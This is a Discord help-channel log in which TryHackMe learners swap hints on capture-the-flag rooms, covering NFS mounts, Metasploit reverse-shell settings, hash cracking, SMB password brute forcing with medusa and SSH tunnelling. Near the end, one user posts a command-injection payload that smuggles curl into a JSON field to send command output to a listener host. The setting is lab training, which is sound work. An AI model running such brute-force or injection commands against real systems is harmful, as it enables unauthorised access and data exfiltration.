#room-hints

appreciate it 👍

it is the same password for both rooms. you guys might wanna update the hint on hackback2019 @steady stratus

Good to know, I'll enquire about getting the hint for hackback2019 amended to include that @lusty wigeon (:

trying the lin pric esc room

the nfs part

i try to mount the folder with the command ||mount -t nfs 10.10.188.73:/tmp /tmp/nff||

but it says failed

Might need to be ran as root.

Also there's a dozen Linux privesc rooms. Link. @eternal brook

https://tryhackme.com/room/linuxprivesc

task 19

the task does not say to to what i am doing...but i was just trying it out.....as ||tmp|| folder is accessible outside

but i cannot mount this way

It tells you to use the root user on your machine

So you need to use sudo.

i used sudo

same result

why do you have -t in your command twice @eternal brook?

just try sudo mount -t nfs 10.10.188.73:/tmp /tmp/nffmount

oh i pasted it twice by mistake

ahh, i didn't catch that, nvm
looking back at my notes I used an option tag to specify read & write access ||mount -o rw,vers=2 10.10.30.155:/tmp /tmp/nfs||

yea i see but i had the question why -t isn't working what's the problem with that

@eternal brook I'm sure I've told you before. If you get an error message, show us the error.

So, mind doing that now?

i'm sure there's nothing wrong with the -t, it just specifies the type of mount for those situations where the command can't work it out by itself - unless you have something else going on, which we won't know without the original error message of course

They probably need nfs-common

Which we would be able to tell of they had actually shown us the error message at the start

sudo apt install nfs-common

exactly same error....also if you don't wanna help it's fine just stop being so rude i'll find the soln anyhow if you gonna ans like this every time you can simply block me i ain't asking anymore you too would have learned somewhere and asked someone but this ain't the way to help @stuck fractal

No. You just need to give people enough information to help.

Rather than just saying "it's not working!"

That's all it is. And you learn that with time. A picture paints a thousand words. Don't force yourself to type a thousand words describing it.

to be fair @eternal brook you'll find it hard to find any community where you can get more support more quickly than here, best to take the feedback and keep learning than get huffy

i'm not talking about this time in general ....you could have simply said share ss of error instead of writing like that...

yea ik

Like that?

you should scroll up if you have time...

I did.

why not drop it now

did mounting it work the way I suggested @eternal brook? you should also check that you haven't actually been accidentally successful in mounting without noticing and are trying to mount an already mounted directory

anyone facing issues on joker CTF ?

That's a buggy room, I assume you have issues with privesc?

@keen willow known issues, the aliases don't show up

oh man, i am banging in for hours

They sometimes show up, sometimes don't

hmmmm, shall i google for answer or keep terminating room ?

yea i'll try that way @median compass thanks..

You won't get an answer from google.

You won't get an answer from google.
@stuck fractal looks like they do: https://www.embeddedhacker.com/2019/10/hacking-walkthrough-thm-ha-joker-ctf/

That's a writeup

Newer writeups won't contain answers

@warm schooner @solid patrol thanks for the help earlier with the intro to python challenge finally got it after a break and some further reading

no problem

are boxes slow or only me facing issue ?

HackPark in perticular.

hackpark is known to face issues, are you a subscriber or free user?

Subscribers don't tend to have the speed issue due to increased resource allocation to their rooms

IIRC hackpark is a subs only room?

Hey all, i got stuck at task 18 of ZTH: Obscure Web Vulns room. i try to change alg to all the value i know but i can not get right jwt. Anyone can give me some hint?

Cage Room Task 2 Any Hints !!

Where It Comes From (Founded)

What's Next !!

@stuck fractal yup

@untold sinew I am stuck on the second last level of JVM reversing. Can you provide me a hint please?

Cage room any hint for last task??

@tiny ivy you might want to check groups

Doing cage box at the minute and just wondering is the second last letter of the || decryption|| of Weston's password, is it a ||n|| or an ||N||? It gets parts of it then messes up the rest

umm sorry @burnt cosmos, according to my notes it's neither of those

how are you doing the decryption? (remember to use || tags for spoilers)

Christ, i didnt think I've had to go in as much as i did! Figured it out though, thank you :)

great, happy hunting!

is there a reason the hash in daily bungle wont work anywhere i add it to a text file try and crack it like every other hash and john wont reconize it nor will hashcat. driving me crazy looks perfect how i added it but nothing but problems

@graceful sun do you have jumbo john?

never heard of it

ill get it

it's the deluxe version of john, search for it on github

thanks!

if I remember right, it should be bcrypt

I'm working on the Avengers Blog. In Task 7 it says it should be vulnerable for SQLi, but it seems not to be.
I tried all the different combinations execute the SQLi through the form, but it keeps coming back with the password not being correct

might have to scan it with a tool like sqlmap to find the sqli @chilly canopy

@oblique cliff I'll try that

any reason why after installing that im still getting No password hashes loaded (see FAQ) lol crazy, never has this happened before. and all the walkthroughs are like. "just crack it with john" "or hashcat" i have really no idea whats wrong i got the hash why wont it crack?

is your syntax right?

john hash .... usally works everytime and yeah ive tried the syntax from about every walkthrough copy and pasted it with my info added and still it acts as if the hash is not a hash

guys has somebody played the mr robot room?

i need hints 😦

specifically....? @real plinth

can you show a pic @graceful sun

well i press enter and it says No password hashes loaded (see FAQ) , thats it but yeah i will thanks you

something really odd happened now its working lol

what can i say im a magic man

hahahahahah!!! ^

@oblique cliff im inside the wordpress page

but idk how i can execute a file, for example a reverse shell in python or something like that

i know to upload files but not to execute em

lets move to #room-help

on yotf, am i meant to bruteforce at all?
and also, should i first target ||samba|| or ||http||?

anyone doing YOTF?

i'm trying to

There’s not gonna be any hints for it (: gl

oh nice

somebody can help me with the RP: Burp Suite Room??

guys anybody have any idea with the impossible challenge

https://tryhackme.com/room/theimpossiblechallenge

i have got the users ... but dont know which password lists to use

rockyou is taking alot of time

@rain kernel yeah

@visual ore rockyou helps or ||not

YOTF no jokes i cant handle that now man

Hehe, the writeup will be out a week after the last prize is taken

got the three files .. how to read them ?

seems fair i cant wait to learn what you need to do there

YOTF I can't do anything a few suspiscious points but nothing real

i feel you

I think we're missing something I will try harder

you got this

ez

I can't complete the "Game Zone" room as from spinning up a fresh box, I cannot create an SSH tunnel. Address already in use..

@tacit roost when the yotf machine changes the earlier credentials dont work

Why ping Ashu?...

And yeah, the box is running an autogen

Creds change every time it deploys

Is that to me?

No, that's to hk

In terms of you, it sounds like you're trying to open a port on your own box that's already open

What port are you using?

The box has the local port 10000 open hosting a CMS but remote access is blocked. I need to create an SSH tunnel to forward it.

ssh -L 10000:127.0.0.1:10000 -f -N cred@ip

I receive:
bind: Address already in use
channel_setup_fwd_listener_tcpip: cannot listen to port: 10000
Could not request local forwarding.

I've followed the writeups and it should just work but it doesn't.

I've restarted the box from fresh and same issue.

What's the box IP?

10.10.62.147

Ah God now I can't remember the creds

Should be in the room

@inland onyx dont you give any hint about the Fox?

No hints yet, I'm afraid 🙂

oh thanks ^^

yotf is killing me!! been on for hours and still stuck at first login. i got idea but dont know how to use them, Prize number 1 was what i really needed to complete the other 2 from elearn i have but cant afford but looks like no go...im not giving up but im so fuc@ing lost. I wish i was smarter!!

lol same

been on it for at least 6 hours now

i have some info but no clue how to crack it lol

same, since it began and i have nothing 😦

@west basin @slender mulch want to jump into a gc?

Gc

yep

What is gc..chat?

Sure

year of the fox- wth is this cipher?

new room, no hints yet.

got it

(the fact its a new room) 🙂

It's more the fact there are still prizes at stake

I am close

really close 🙂

i was trying to solve break out the cage. Cant figure out where to proceed i got few directory but no use. Ftp anonymous login and got file but nothing that i could figure out was there. any small hint is appreciated

did stego on few images exif and zsteg...

I am doing the room ''r2 Vm'' and there is a command "af1" to list the function of the binary but it is not working, can anyone help me why is it not working

I am doing the room ''r2 Vm'' and there is a command "af1" to list the function of the binary but it is not working, can anyone help me why is it not working
@white salmon "afl"

@white salmon check your pm

I am stuck on binary analysis of "if2" answer for "r2 VM" room, can ony one help me... I suppose I have the right answer but its not working

Guess the password = Bruteforce ?

In LianYu ... How do I know the username of ssh user??

Is it given somewhere??

yeah it is given

just find the directories and it'll lead you in the right direction

Web directories??

yeah

I only see the ftp username

help i need assistance

i cant list the ftp

@past edge rip

@past edge try re-deploying the box

i already did that too

Switch VPN servers @past edge it’s a known issue

okay will do

thanks m8

Learn Linux Room Final Task 43 been stuck here for days

@tall mantle Have a look at all of the files of the users

still don’t have access to root directory

What three letter abbreviation is the technical term for the "wifi code/password/passphrase"?

...........oh mate.....

I would approach the question by checking what the acronyms of the security standards mean

yeah I have been checking wireless abbreviations on the internet

What are your findings?

No luck

It didn't?

https://tryhackme.com/room/wifihacking101 ?

yes

weird, after refreshing the page it worked 😑

It might have been giving you the roundabout 🙂

I completed other tasks, that was just bugging me 🙂

Glad you got it 👍🏻

i was trying to solve break out the cage. Cant figure out where to proceed i got few directory but no use. Ftp anonymous login and got file but nothing that i could figure out was there. any small hint is appreciated
@Blacklist#6333 the file from smb is useful, but before that you need a secret from one of the hidden web directories...an audio file

ftp not smb

The FTP file is very very important, just look carefully at it.

Briskets was very nice in creating a writeup for my room, check it out. If you were stuck!
https://briskets.io/impossible/

Iam bussy with the linux walk through Task11 i have made noot.txt in the home directory of shiba1 but i cant execute it ( logic because it is a .txt )

But i have no clue what i need to do now to get shiba2's password

because non of the commands that i have learned is helping me out ( i think then )

Also why is shiba1 marked red?

what does that mean on linux /

Execute the binary not the .txt file.

@proven bridge, got completely distracted and slightly burned out last week. Do you still want me to create a writeup? That message just reminded me

@proven bridge, got completely distracted and slightly burned out last week. Do you still want me to create a writeup? That message just reminded me
@warm schooner It's up to you, there's only so many ways to solve that challenge haha. So, if you can think of another way to do it, absolutely!

Will look at Briskets writeup and try to solve it a different way

Sorry about that 😦

It's all good, I appreciate it regardless.

@MuirlandOracle the guessing in security challenges is a lame thing

@inland onyx the guessing in security challenges is a lame thing
@stoic jewel Eh? What are you on about?

🦊

I mean, A) You may end up having to guess a password based on OSINT in real life. B) That isn't a guess there...

@minor bough can u help me? I am trying to complete the room created by you

Which room?

blue

Sure! Where are you stuck?

the exploit fails

Have you confirmed that you can scan it?

I'll share sceernshot

ya

And are you connected directly? If the box is connected via NAT then it will fail

Can I get a screenshot with your options as well?

ya sure

just a min

No rush!

So it looks like your vpn cut out in that case

Or the box crashed

i tried to redeploy the box several times but no luck.

any solution @minor bough

Most likely fix your VPN

Try rebooting kali and verify that you have only one instance of your vpn running

And terminate + redeploy the box

EB can take a few trials

Ok thanks @minor bough @stuck fractal

Why are you using that payload?

which to use?

The default?

By default it is set

I did'nt set payload

@minor bough They changed the default payload for blue, it looks like. For some reason, I haven't seen the https rev shell working

ok which payload should I set then

@minor bough @stuck fractal

No need to tag us.

OK

Dark's going to be at work at the moment. It's a saturday, I'm dumb

reverse_tcp was the default

if you're running kali in a VM, make sure the VPN is running on kali not on the host OS

Ok I have working since morning and stuck

no VM

Its installed

should i set payload to reverse_tcp and try

Why is LPORT set to 16?

Wat

sry I'm a beginner can u guide me

??

how to set lport

That is very much a question for google. how to set lport metasploit

ya but I'm using openvpn so what address and port should I set

https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/ 🙂

Use your OpenVPN tun0 address

And pick any port

But 16 is weird

Don't set 16

Make sure the VPN is running on your VM, not on the host

But also I've never seen the https reverse shell work.

Yeah, pick a port over 1024

@inland onyx EB has changed on msf

Now defaults to a https payload

Interesting. I used it the other day

That is really strange

Why on earth would it use a https payload

At least, that's what they're saying and that's what I've seen a single other person do

I changed port no luck

Can you plz help

@rotund skiff Big thank you for your help on the Learning Linux room. I saw the history of this channel and your command helped a great deal.

@pulsar orchid Use reverse_tcp and set LHOST the tun0 IP.

Make sure to set RHOSTS correctly.

And set LPORT to default 4444.

Then re-run the exploit.

It should do the trick.

everything else is ok I'll try using reverse_tcp

thx @white salmon

Did it work?

thx alot @white salmon It worked using reverse_tcp.

Great job.

Good evening guys;

I'm trying to break some NTLM hash which more then 20 characters long

NTLM hashes aren't salted

Use an online tool

Especially if it's for a THM room.

every website I tried failed

If it's not for a THM room, don't ask here.

it's for a room,

Have you tried OSINT password cracking?

can somebody advise me with some websites ?

Also known as type the hash into google?

Which room is this?

the results on google take me to walktrhrough

which I don't wanna see right now

It's not a feasible one to bruteforce

Same as the others

yeah, time consuming

but don't you mind,

I can't fix it

unintentionnaly my eyes came across the answer

I can raise it with the admins, which I've done a couple times and just done again

OSINT like you said

never mind @stuck fractal, I'll look later into the walkthru to learn how did they do it

for now task completer

thanks for the OSINT trick

@rose moss https://md5decrypt.net/en/

Yeah so the challenge is kind of impossible

The writeup isn't a writeup

It's a series of answers

the room is ||Catch the flag|| as you may have guessed

The online tools seem to no longer work

That's not the room title

https://tryhackme.com/room/c4ptur3th3fl4g

the hash is ||11FE61CE0639AC2A1E815D62D7DEEC53||

yeah, whatever

it's been reported many times ?

I've complained about it many times.

Because it's not feasible

well,

I'd like to understand how the ones that did the walkthru got it

So would I...

never mind body, thanks anyway for the clarification 😉

@inland onyx hint for yotf ... can see the three files.. where to go from there

No hints for Yotf until all the prizes are taken

okkkk

Hi ! In the room Lean Linux, for the task 33, it says that we have to find the binary named shiba4, however when i use the find command it says that no such files or directory exist, is it normal?

You're using find wrong

find shiba4 isn't how find works

You mean that i can't find the file with the find command?

No, that's not what I mean

I mean that running find shiba4 doesn't look for files called shiba4

Indeed im a stupid, thanks 🙂

Don't beat yourself up

I may need some help once again for the final task... I think I could be interested with the users noot and nootnoot but I can't file any files in order to find their password

Look for files belonging to every single user

Investigate weird ones

is there a syntax to only save the result of a find command for the outputs without an error ?

I don't want to see all those "permission denied"

You can supress errors

It's a shell thing, not a find thing.

Trying to do Task 3 #6 but it keeps saying that the build date is wrong.

I am in the etc folder

And I have put in builddate, builddate.timet, builddetails and buildrev as the answer.

Is there another file I need?

Room?

Dumping Router firmware.

I just read a writeup and inputted the builddate on there and it worked.

Should I raise an issue?

I got this date from builddate.

2020-04-22 11:44

If you have pictures of what you got and that’s different than what it should be you can post that pic in #site-bugs and what the issue is

Okay I'll take the screenshot now.

Did you download the version that you were told to in the room, from the github repo?

https://github.com/Sq00ky/Dumping-Router-Firmware-Image/tree/master

This one right?

yes thats right

I did git clone https://github.com/Sq00ky/Dumping-Router-Firmware-Image.git

I feel like I remember struggling on that question youre talking about look everywhere I everywhere in the files

I remember it being in an odd location

What do you mean?

It should just be in etc right?

no it was from another file if I remember correctly its been a long time

The writeup says it should be in /etc/builddate

Copying the writeup date worked for me.

writeup build date

what is the build date you have from yours

2020-04-22 11:44

can you send a screenshot of it as well with the command

try without ./

Still the same

yeah its an issue with the room because the repo says its last commit was the 20th which is that same day put it in bugs

tag spooks

Who's that?

I can't see him in my @s

rikka best girl

@last nova

he changes his username every 5 minutes

ah!

hello people, could i get a hint on the mr robot room?

just ask your question

fixing now @white salmon

is this box more focused towards actual "hacking" or going to otherwebsites for clues or something along those lines...

bad spooks your room bork

blame Linksys

https://www.whoismrrobot.com/ also this... is this supposed to be used to solve the box?

or am i just going way out of scope

holy hell

out of scope

😂

youre thinking way too much

@last nova, awesome! thank you very much. Don't want other people getting tripped up by that.

you're fine

yeah ill just.... not with that other website

ping me if you find anything else

thanks guys hahaha

lol

@last nova youre broken

i saw the link and was like damn they put a lot of effort into this

yes

I am

@last nova why do you change your name every 5 minutes?

imagine being Linksys, not updating for two years

And what’s coming next? 👀

and then

finally

they update their firmware

linksys: hmmmmmm nonone needs a firmware update but theres this one room on tryhackme that uses it

Take that! (ノʘ言ʘ)ﾉ ⌒┫ ┻ ┣ ┳☆(>｡☆)

YOU WILL UPDATE

right, i need a little bit of a hint if you guys would... on the robot room again ;)

just to get me going in some direction

Enumerate

@lean rover

@solemn smelt hey that table did nothing to harm you

hmm, my usual tools aren't turning up much

Use other tools

do some manual enumeration

hmm yeah, gotta try harder tbh

thanks boys!

(or girls idk)

Damn don’t put us in a box man

'_'

man?

did you just....

You’re gosh danged right I did

https://tenor.com/view/anime-goku-dbz-dragonball-supersaiyan-gif-8246706

Hey guys,

I'm doing the Ice room and I'm trying to compile 568.c from exploit-db. When I try compile it with x86_64-w64-mingw32-gcc ./568.c it says that it can't find winerr.h. Where can I download this file?

Okay, I think I got it.

Trying to make my own python script since a writeup said that they did it that way.

basing it on the metasploit module.

It seems like creating your own exploit is easier than compiling that bloody windows C code.

while doing attacking kerberos room > gaining hash with kerberoasting > while cracking the hash > I am getting this error after trying different possibilities : Hashfile 'pass.txt' on line 1 ($krb5t...2E3FCC4E73B0E592C47E6E48F24BBC4 ): Token encoding exception

can someone give me hint here what i am doing wrong

Google gives answer to save it with utf-8 encoding. i have done that also

Did you take the token in hashcat or John format?

@lime needle what is that. I direcly copied the text from my terminal and pasted it in a txt file from text editor (also removed the extra whitespaces) and saved it with UTF-8 encoding

resolved

hello, just finisheld Pickle Ricks room, i found an encoded string in the ||portal.php||, i tried with the base encode (64,85,81, etc) but cannot found the corret. can someone help me with that or i dont have to spend time on that?. thanks.

you mean the ||Vm........|| something? @clear cargo

you mean the ||Vm........|| something? @clear cargo
@clear creek yea

you r right with the base encode. but there is more, much more and... well it s not very usefull 😄

how do I copy files from ssh to my local machine?

hmm scp maybe@true widget

you can use nc to

why I unable to copy?

eventho I have suid permissions for /bin/cp@clear creek

Check you have the right permissions

id or whoami

synthax was wrong @warm schooner

guys, do u have any idea why I can't get to list all files

meanwhile this picture from a walkthrough runs perfectly

maybe write it in the file name

ok will try

i have a problem with linux-beginner 😒

i tried on my windows and the path C:\windows\system32"." works to view all the files in it

task 11 binary, i deploy the machine insides the in-browser kali, then i try to ssh user@ipadres from the deployed machine but with my tryhackme user my password does not work

thx m8

whats your command ?

the room is learn linux btw not linux beginner

ssh user@ipadress

which user i mean

my username on try hack me

wait that might be wrong

^^

if i remember well u get a user at the beginning

yeah did the previous questions a few days ago so kinda forgot it lol

try to get into with this one 🙂

yeah that worked

i am a shitty hacker lol

can you imagin hacking into something using your own credentials 😒

well if you hacked it befor XD

unlickely with my skills 😛

synthax was wrong @warm schooner
@clear creek Ah okay, glad you fixed it

i tried on an other box and the syntax is correct
Ohhh you change color @warm schooner

iam busy with linux walk through task 21, i dont understand what they want me to do

can someone give me a hint to the right direction ?

fox

Lol nvm guys i made a typing mistake thats why i didnt get through xDDD

Hi guys, can I please get a hint how to answer Task 3#6 from Linux Challenges
I tried running mount and also checked with the command df. I went to each mount and searched for something out of normal (files belonging to one of the users) and entered the /home or /mnt directories (if existing). However, I am stuck.

Sometimes thing are mounted in ||the /media ||directory @white salmon

Thanks for the tip @oblique cliff!

Hi, I dont understand the question 2 in Toolbox VIM: How do we start entering text into our new Vim document?

I just look like you have to type i in order to enter insert mode and then write whatevr you want

it just looks like*

yep

but the answer has 6 caracteres

and it isn't "insert"

i don't understand what type of answer it is wanted

I managed to answer every other questions of the room but can't figure out what i have to answer to this one 😦

you type

Ok thanks 🙂

just get strated with YOTF

Any Hints After First Login !!!

@stoic jewel no, there are still prizes to be claimed

HI Team sorry to ask this silly question, not sure why its working ---> Linux Task - 6 ---> How would you output hello without a newline

echo -n "hello"

is there any mistake in above ?

Its not working for me. Thanks alot for Help in Advance!

@latent jungle that exact command works for me, what happens when you do it?

"uh oh " - your answer is incorrect

ah, they just dont want quotes

ohh ok

Perfect!!! It worked Super Thanks

😄

Hello, I need help for the blue room, we have to crack a password from its hash. I used hash-identifier to find what is type the hash, it says md5, is it correct?

@worthy scroll grep -n shows the line befor the word

like cat <file>
uwu
lol
XD

grep -n <file>
1:uwu
2:lol
3:XD

it shows you the line number

do grep whitout the -n tag

and you ll see

Idk 😄

ctrl + f XD

@prime star why dont you give it a try and find out?

Because I tried to use john with md5 format but the answer isnt the good one ^^

if you research john syntax, you'll see md5 isnt a valid format

its called something else

It is raw-md5 right?

--format=raw-md5

yes, that is the correct syntax

although if you got a hash from the SAM file, it's not gonna be an MD5 hash

not sure how you obtained the hash

from meterpreter using hashdump

I got Administrator, guest and another account

then user:aaa:bbb

yep, research the format windows password hashes are kept, then

i used bbb into hash-identifier and it told me md5

https://netsec.ws/?p=314 @prime star

oh yeah forgot about the NT LM format

thank you

🙂

any time

Indeed john is more efficient with the right hash format ^^

cheers

that certainly helps 🙂

Hi guys, i'm currently following the "learn linux" and there is the bonus challenge at the end, can someone give me a hint please ? 😄

enumerate

check user permissions

I'm trying yeah but looks like I can do nothing with shiba's account

@prime star automated hash identifiers can't tell the difference between md4, md5 and NTLM. That's why it's really important to use context.

does anyone know a way to help find your $PATH

It's a variable. You can just echo the value.

Ok found it @oblique cliff but I don't understand how we should know the pass was here

by enumerating 🤷

any hits about yotf?

@white salmon dont think all prizes are dished out yet, so prob no hints to be given ..

they ware out

10/10

are

😮

I am a newbie at ethical hacking. Stuck on the last task on the learn linux room

Can someone hint me as to how to access the root folder

where should I look or what should I do?

You gotta become root

Yup i know that

only way i knew was cracking the hash in etc/shadow

from another tutorial

but nuin else

You can't read /etc/shadow unless you're root.

yeah figured that now

i dound some interesting files also in nootnoot

And Ubuntu systems normally don't have a password set for root, so there won't be a hash either

Do i have to go through other users also (like nootnoot) or will I be able to login as root

directly

Do you have a password for root?

nop

Then you can't log in as root?

in the etc/passwd file there is an x in the password plave

and nop i cant login it does ask for password

Use find to look for files belonging to each and every user. Investigate suspicious ones.

x in etc passwd means the hash or other info is in shadow

i tried that fouind a file ll

Keep looking

alright let me try, if stuck will get back

I also found some .sudo as admin file

seems like the binaries i did earlier in the room

can someone give hint for last task in "intro to python" room

Use for loops

Read the documentation for the library like the room tells you to

@brittle latch Keep looking, the binaries can't be used to privesc due to how they work internally

I thoughrt they would reveal a password

They did.

need some hint on how to get the files in smb since get is not working yotf

is something wrong with the year of the fox room, my brute force always ends in an error

tried restarting the room many times, still the same result

tried hydra, medusa all of them end in an error, while one of my friend is able to get the password with the same tool we used to brute force

anyone here who can help with a small nudge on this, just want to know what is going wrong here in my situation

Pro tip

When you say something is giving you an error and you want help with the error

You need to tell/show people what the error is and how you got it.

ok

I tried this ||medusa -h 10.10.106.56 -P /usr/share/wordlists/rockyou.txt -u fox -M smbnt|| it always ends with an error around the 300th word count like this

||0 complete) Password: bowwow (300 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 10.10.106.56 (1 of 1, 0 complete) User: fox (1 of 1, 0 complete) Password: portugal (301 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 10.10.106.56 (1 of 1, 0 complete) User: fox (1 of 1, 0 complete) Password: laura (302 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 10.10.106.56 (1 of 1, 0 complete) User: fox (1 of 1, 0 complete) Password: 777777 (303 of 14344391 complete)
ACCOUNT FOUND: [smbnt] Host: 10.10.106.56 User: fox Password: 777777 [ERROR (0xFFFFFF:UNKNOWN_ERROR_CODE)]||

my friend on the other hand is able to crack the password with the same command

I didn't get any passwords with SMB

okay so you saying you did not brute force smb share?

@white salmon i use this command sudo medusa -h 10.10.72.88 -u Fox -P /opt/rockyou.txt -M smbnt -n 445

@white salmon let me try that, the command you shared does not seem too different from what I tried

but change the ip

and were you rock you si

is

yeah i did that 🙂

and?

no luck mate, I still get the same error as I shared above 😦

are you sure you have there rockyou decompress?

yeah I do, I have used that on many boxes on before

strange this is it says me ACCOUNT FOUND and still shows me an error like this :

||ACCOUNT FOUND: [smbnt] Host: 10.10.55.137 User: Fox Password: sebastian [ERROR (0xFFFFFF:UNKNOWN_ERROR_CODE)]||

hmm

and my hydra takes ages to crack the password

i know

tryed it myself

i am running latest parrot OS, should it be something related to this? though i personally think it shouldn't be regarding that

i'll try the web browser kali once and see if I can succeed there

i have kali for my it work

okay, I can confirm this is due to some problem in parrot OS

cuz in THM browser kali, I am able to crack this in like literally seconds

Not surprised.

did you guys reveal the hashing algo yet?

(for the cipher)

For what?

yotf

Yeah, I revealed it earlier

head -10 /dev/urandom | sha256sum | base32

grrrr I was so close 🙂

I started with base32 first

btw, medusa seems to work faster than any of the other tools i've tried

true that, hydra takes ages for this task

@inland onyx for future reference, are there any tools i've could have used to identify this type of cipher?

It aint a cipher

It's base32 encoding @regal comet

I was referring to the sha256

That's also not a cipher

It's a hashing algorithm

You can't reverse it except by brute force/rainbow tables

so after you got the cipher.txt, are you saying that in order to retrieve it, i had to run head -10 cipher.txt | sha256sum | base32 is that correct?

No

That was how it was generated

That's the command that was used to make it

the reverse , bar the head -10 .. etc

It was some random bytes that were hashed and then base32 encoded

You can't reverse it

i.e. Take ten lines of rubbish from the random pile, hash it, and turn it into base32

There is nothing to reverse

It's a troll

In other words, it's a troll

You got trolled.

of course 😄 ...

Just like The A Team. Twice

fu**

So don't worry too much about it 😁

🙂

You got CTF'd

so those two files are a decoy?

looks like this is a rabbit hole, ran hydra on those 2 hashes for almost 30 min still no luck, lol

@white salmon Hydra doesn't attack hashes.

wat

@stoic jewel Can I ask you to take 30s before sending a message, and to not send the message if it does not contribute at all to the conversation? At least in the help channels.

sorry I meant john, lol

😂

I am stuck trying to crack creds1 and cipher

its a rabbit hole right?

yup

it is indeed a rabbit hole

creds2 is not a rabbit hole?

There’s a creds2? 😂😂

Sigh now I gotta fire up the machine again

creds2 is probably one of the first files you saw

Then I’m probably blind

wait creds2 is from the webapp once you login right?

I am still trying to figure out how i can get my payload work in this case, I cannot read the JS code it self, it looks encoded

finally command injection

You injected a payload? @wraith fulcrum

Hi guys i am following the instructions about the room "RP: Metasploit"

You injected a payload? @wraith fulcrum
@white salmon yes I got in

anyway creds2.txt

not able to decrypt it

same crap

That's because most of the creds files aren't encrypted

iis a sha256

One is a complete rabbithole.

Sha256 isn't encryption

its a hash

But it's a rabbit hole

And you can't decrypt a hash as it's not encrypted.

@stuck fractal what about the crack of the hash

@stoic jewel What about it?

That's not decrypting it

@scenic grove Please change your profile picture.

@stuck fractal is there even a point looking at the smb shares in that case?

@regal comet ???

for the yotf

I don't know

Maybe there's a point, maybe there's not

I haven't rooted it, I can only tell you what I know

I was going through the comments and looks like its a rabbit hole

You'll have to figure that one out for yourself 😄

I am experiencing something i didnt yesterday

I am no longer able to see the files in the share

after brute forcing the creds

is that to be expected?

(since the machine expired i had to redo it)

Uh... I didn't do anything to that...

(Please don't be broken 🙏)

Oh, you're aware it autogens right?

The password changes every deploy

yeah, yeah. I am saying i keep getting mount_smbfs: server rejected the connection: Authentication error after re running the brute force

🤷‍♂️ No idea on that one

hmm...

hopefully its not broken 🙂

I really hope it isn't broken

are you able to take a peak?

I have fixed this damn thing too many times 😆

so maybe it is lol

Nope, it's letting me in just fine locally

Can you DM me the command you were using the bruteforce Samba please @regal comet?

sure

Ta

STUCK > https://tryhackme.com/room/rpburpsuite > TASK 7 > #6 (any help pls)

Can you explain what you're stuck on and what you have tried so far please?

Disregard that. It's actually in the task description. You'll need to read more in order to answer that one.

The hint also suggests as such. 🙂

any hints on the text from the ftp in room Break Out The Cage.1

"french cipher" mightbe a helpful hint ;)

also check http before trying to decode this message

aaa pls hint on key ... 😭

@white salmon Audio

ty

on yotf - ||is brute force the only way to get the password for the smb user?||

Im working through the Metasploit room with the title ICE and it's telling me that I have to set LHOST variable to my IP on TryHackMe. It's then telling me that it will likely be my tun0 interface using ip addr . On Windows that wouldn't be my Private IP address shown in OpenVPN Connect window would it?

10.x.x.x IP address @white salmon

this one?

But if you're running kali in a VM, you need to run the VPN on the VM.

it starts with 10 and its the same one as my private IP on OpenVPN Connect

Where's metasploit running?

oooh excellent okay Ninja thank you!

Metasploit is Im running Kali VM on my windows machine, my host system meanwhile I'm using a Kali VM for metasploit 😄

I will do that tomorrow thank you!

Don't run metasploit on windows that's gross

Yeah so you need to run the VPN on kali otherwise you won't get reverse shells or most metasploit shells.

Also it was pretty gross getting so many notifications from Windows Defender after having installed metasploit on here 😄

Thanks a lot!

That's why you work in a VM. One of many reasons

I'm stuck on the last step of a room. Is there a way to change file contents of a setuid file as nonroot without clearing the setuid flag?

Nope.

Changing the contents will remove the suid bit

That's what I thought. I'm new to pentesting so just wanted to make sure. I'll abandon that route.

Can I PM someone for some tips on the final question in the linux activity course?

@ashen matrix what have you tried?

on yotf yesterday I was able to run su on www-data

today after reboot is not possible

I got su

bash: /bin/su: Permission denied

@wraith fulcrum perhaps it was unintended, and patched....

i do beleive the mods were trying to crack down on unintended routes...

@wraith fulcrum at least you were able to get a shell. I’m still figuring out how to do so

@lean rover ... then I am lost I

@wraith fulcrum mind if I dm?

@thorny nest go ahead

any help on yotf (got creds, some files 2), thanx

yotf is killing me, haha

how much time it takes to guess the password for year of the fox?

is the password at the beggining?

Guess? Quite some time.
I recommend you don't try to guess it

no

thank you @inland onyx

I am so fu proud finally got user on yotf

Nicely done @wraith fulcrum (:

hello

can someone help pls?

https://tryhackme.com/room/rpmetasploit

Task 7 #1

Let's go ahead and run the command `run autoroute -h`, this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the -n flag in your answer.

i tried run autoroute -s 172.18.1.0/24

Use the -n flag in your answer

run autoroute -n 172.18.1.0/24

also tried

read the help page carefully to see what you need to do

there's no help page on this one

HINT: there are two flags in this command

oh ok

run autoroute -h that's the help menu

i ran this

worked

ty

nice

Could I please message someone about the linux course? On final question and I don't want to place what i think in here as it may either give away the solution, or i may be totally wrong.

you can dm me @ashen matrix

@ashen matrix no problem you can put it here in Spoiler tag ||Your text||

Is there a better way to get HTTP access than brute forcing in yotf?

Hi Team, I am actually working on Linux Room and Last Task - 43, this task is about finding root password. I tried a lot of ways but am struck is there any hints ? Or can you please assist in guiding me. Thanks a lot for assistance

You're not finding the root password.

There's a hint.

In room Inoculation, what is that outgoing web hook?

try searching for files owned by all users @latent jungle and look for one that doesn't fit

did anyone the "year of the fox" room?

Don't ask to ask, just ask

I need help for the decoding of the smb files...

is there any way i can reset a box ?

terminate an deploy again

hmmm ... i guess that just switch the box not reset, is it?

No

That will reset the box.

Complete fresh box.

what about other users connected to that box, they lost there way ?

Hi, i'm doing the intro to x86-64 room but can't figure out task 6, i looked at the hint ||"does this binary use string splitting and special delimiters."|| but can't find any mention of ||string splitting or special delimiters|| in the room or on the internet. Does anyone have a hint or resources to help? thanks

@keen willow You don't share boxes here.

thats cool to know, really. okay i give it a another try, will ask if required

hmmm.... any idea if HackPark has any known issue?

It dies after an hour.

No matter what you do.

yeah, that i just came to know, anything else u wanna share like, i was looking for weird process, but coundn't found one

i even tried tried counting answer's characters with place-holders on answer fields 😆 , but no luck.

can any help on getting command exec on year of the fox room from search page

||this payload dosent work for me : {
"target":"curl -X GET -d $(ls) http://10.11.10.59:8000/"
}||

Your RCE payload relies on already having RCE

You're trying RCE within RCE

that was for me @stuck fractal ?

Who else would it be for?

You're trying to run curl, which is a system command, in order to get execution of system commands

